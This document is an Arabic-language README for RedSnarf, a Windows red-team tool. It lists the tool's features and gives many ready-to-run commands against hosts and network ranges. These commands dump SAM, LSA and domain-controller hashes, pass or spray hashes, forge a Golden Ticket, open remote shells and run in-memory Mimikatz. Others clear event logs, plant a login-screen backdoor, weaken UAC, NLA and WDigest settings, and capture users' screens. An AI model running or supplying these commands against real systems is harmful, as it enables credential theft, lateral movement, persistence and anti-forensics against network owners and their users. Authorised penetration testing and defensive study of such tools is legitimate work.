
RedSnarf هي أداة اختبار اختراق / فريق أحمر لبيئات ويندوز
______ .____________ _____
\______ \ ____ __| _/ _____/ ____ _____ ________/ ____\
| _// __ \ / __ |\_____ \ / \\__ \\_ __ \ __\
| | \ ___// /_/ |/ \ | \/ __ \| | \/| |
|____|_ /\___ >____ /_______ /___| (____ /__| |__|
\/ \/ \/ \/ \/ \/
[email protected]
@redsnarf
ريدسنارف هي أداة اختبار اختراق / فريق أحمر من إعداد إد ويليامز لاسترجاع التجزئات وبيانات الاعتماد من محطات العمل والخوادم ووحدات تحكم المجال في ويندوز باستخدام تقنيات آمنة من منظور عمليات الأمان (OpSec).
شاهد قناتنا على يوتيوب لمشاهدة فيديوهات https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ
وظائف ريدسنارف تشمل:
• استرجاع تجزئات SAM المحلية • تعداد المستخدمين الذين يعملون بصلاحيات نظام مرتفعة وبيانات اعتماد lsa secrets الخاصة بهم؛ • استرجاع بيانات اعتماد MS المخبأة؛ • تمرير التجزئة (Pass-the-hash)؛ • التحديد السريع لمجموعات اسم المستخدم/كلمة المرور الضعيفة والقابلة للتخمين (الافتراضي هو administrator/Password01)؛ • القدرة على استرجاع التجزئات عبر نطاق؛ • رش التجزئات (Hash spraying) - credsfile يقبل مزيجاً من pwdump و fgdump ونص عادي لاسم المستخدم وكلمة المرور مفصولة بمسافة؛ • تفريغ lsass للتحليل دون اتصال باستخدام Mimikatz؛ • تفريغ تجزئات وحدة تحكم المجال باستخدام NTDSUtil واسترجاع NTDS.dit للمعالجة المحلية؛ • تفريغ تجزئات وحدة تحكم المجال باستخدام طريقة drsuapi؛ • استرجاع مجلد Scripts and Policies من وحدة تحكم المجال وتحليله بحثاً عن 'password' و 'administrator'؛ • القدرة على فك تشفير تجزئات cpassword؛ • القدرة على تشغيل شل على جهاز بعيد؛ • القدرة على مسح سجلات الأحداث (التطبيق، الأمان، الإعداد، أو النظام)؛ (الإصدار الداخلي فقط) • يتم حفظ النتائج على أساس كل مضيف للتحليل. • تمكين/تعطيل RDP على جهاز بعيد. • تغيير منفذ RDP من 3389 إلى 443 على جهاز بعيد. • تمكين/تعطيل NLA على جهاز بعيد. • إيجاد أماكن تسجيل دخول المستخدمين على الأجهزة البعيدة. • باب خلفي لشاشة تسجيل الدخول في ويندوز • تمكين/تعطيل UAC على جهاز بعيد. • إضافة mimikatz متخفي. • تحليل تجزئات المجال • القدرة على تحديد الحسابات المفعلة/المعطلة • التقاط لقطة شاشة لسطح المكتب لمستخدم نشط مسجل الدخول عن بُعد • تسجيل سطح المكتب لمستخدم نشط مسجل الدخول عن بُعد • فك تشفير كلمة مرور ويندوز المشفرة (CPassword) • فك تشفير كلمة مرور WinSCP • الحصول على SPNs للمستخدمين • استرجاع كلمات مرور الواي فاي من الأجهزة البعيدة
المتطلبات: Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git CredDump7 - https://github.com/Neohapsis/creddump7 استرجاع Lsass باستخدام procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx Netaddr (0.7.12) - pip install netaddr Termcolor (1.1.0) - pip install termcolor iconv - يُستخدم مع تحليل معلومات Mimikatz محلياً
عرض المساعدة ./redsnarf.py -h ./redsnarf.py --help
استرجاع التجزئات المحلية من جهاز واحد باستخدام بيانات اعتماد محلية ضعيفة ومسح سجل أحداث الأمان ./redsnarf.py -H ip=10.0.0.50 -uC security
استرجاع التجزئات المحلية من جهاز واحد باستخدام بيانات اعتماد محلية ضعيفة ومسح سجل أحداث التطبيق ./redsnarf.py -H ip=10.0.0.50 -uC application
استرجاع التجزئات المحلية من جهاز واحد باستخدام بيانات اعتماد المسؤول المحلي ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .
استرجاع التجزئات المحلية من جهاز واحد باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com
استرجاع التجزئات عبر نطاق شبكة باستخدام بيانات اعتماد المسؤول المحلي ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .
استرجاع التجزئات عبر نطاق شبكة باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com
استرجاع التجزئات عبر نطاق شبكة باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com
رش التجزئات عبر نطاق شبكة ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .
استرجاع التجزئات عبر نطاق شبكة مع تسجيل دخول المجال ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com
التحقق السريع من بيانات الاعتماد ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y
التحقق السريع من ملف يحتوي على أسماء المستخدمين (-hS) وكلمة مرور عامة (-hP) ./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y
استرجاع التجزئات باستخدام طريقة drsuapi (الأسرع) هذه الطريقة تدعم علامة اختيارية -q y والتي ستستعلم عن LDAP وتخرج ما إذا كانت الحسابات نشطة أم معطلة ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)
استرجاع التجزئات باستخدام NTDSUtil هذه الطريقة تدعم علامة اختيارية -q y والتي ستستعلم عن LDAP وتخرج ما إذا كانت الحسابات نشطة أم معطلة ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)
إنشاء التذكرة الذهبية (Golden Ticket) ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y
نسخ مجلد Policies and Scripts من وحدة تحكم المجال وتحليله بحثاً عن password و administrator ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y
فك تشفير Cpassword ./redsnarf.py -uG cpassword
البحث عن مستخدم - مباشر /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name
البحث عن مستخدم - دون اتصال (يبحث في المعلومات التي تم تحميلها مسبقاً) /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name
عرض قائمة مهام NT AUTHORITY\SYSTEM /redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y
التقاط لقطة شاشة لسطح المكتب لمستخدم نشط مسجل الدخول عن بُعد /redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y
تشغيل شل على جهاز باستخدام بيانات اعتماد المسؤول المحلي ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y
تشغيل شل على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y
استرجاع نسخة من lsass للتحليل دون اتصال باستخدام Mimikatz على جهاز باستخدام بيانات اعتماد المسؤول المحلي ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y
تشغيل mimikatz متخفي، هذا الخيار يشغل خادم ويب لتقديم سكريبت powershell، وهو مشفر ومشوش جهة الجهاز، البيانات لا تلمس القرص - يتم البحث عن بيانات الاعتماد بأسلوب سهل القراءة وعرضها على الشاشة. ./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y
تشغيل أمر مخصص مثال 1 ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'
مثال 2 - يجب إفلات علامات الاقتباس المزدوجة باستخدام
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'
سياسة رمز الوصول المحلي (Local Access Token Policy) ينشئ ملف باتش lat.bat يمكنك نسخه ولصقه على الجهاز البعيد لتنفيذه، والذي سيعدل السجل ويمكن أو يعطل إعدادات سياسة رمز الوصول المحلي. ./redsnarf.py -rL y
Wdigest تمكين قيمة سجل UseLogonCredential الخاصة بـ Wdigest على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e
تعطيل قيمة سجل UseLogonCredential الخاصة بـ Wdigest على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d
الاستعلام عن قيمة سجل UseLogonCredential الخاصة بـ Wdigest على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q
UAC تمكين قيمة سجل UAC على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e
تعطيل قيمة سجل UAC على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d
الاستعلام عن قيمة سجل UAC على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q
باب خلفي - باب خلفي لشاشة ويندوز - اضغط Left Shift + Left Alt + Print Screen للتفعيل تمكين قيمة سجل الباب الخلفي على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e
تعطيل قيمة سجل الباب الخلفي على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d
الاستعلام عن قيمة سجل الباب الخلفي على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q
تسجيل الدخول التلقائي (AutoLogon) تمكين قيمة سجل تسجيل الدخول التلقائي في ويندوز على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e
تعطيل قيمة سجل تسجيل الدخول التلقائي في ويندوز على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d
الاستعلام عن قيمة سجل تسجيل الدخول التلقائي في ويندوز على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q
قفل جلسة مستخدم على جهاز بعيد باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y
تمكين RDP على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e
تعطيل RDP على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d
الاستعلام عن حالة RDP على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q
تغيير منفذ RDP من 3389 إلى 443 - تغيير منفذ RDP إلى 443 على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e
تغيير منفذ RDP إلى الإعداد الافتراضي 3389 على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d
الاستعلام عن قيمة منفذ RDP على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q
تمكين Multi-RDP باستخدام Mimikatz ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y
تمكين RDP SingleSessionPerUser على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e
تعطيل RDP SingleSessionPerUser على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d
الاستعلام عن حالة RDP SingleSessionPerUser على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q
تمكين NLA على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e
تعطيل NLA على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d
الاستعلام عن حالة NLA على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q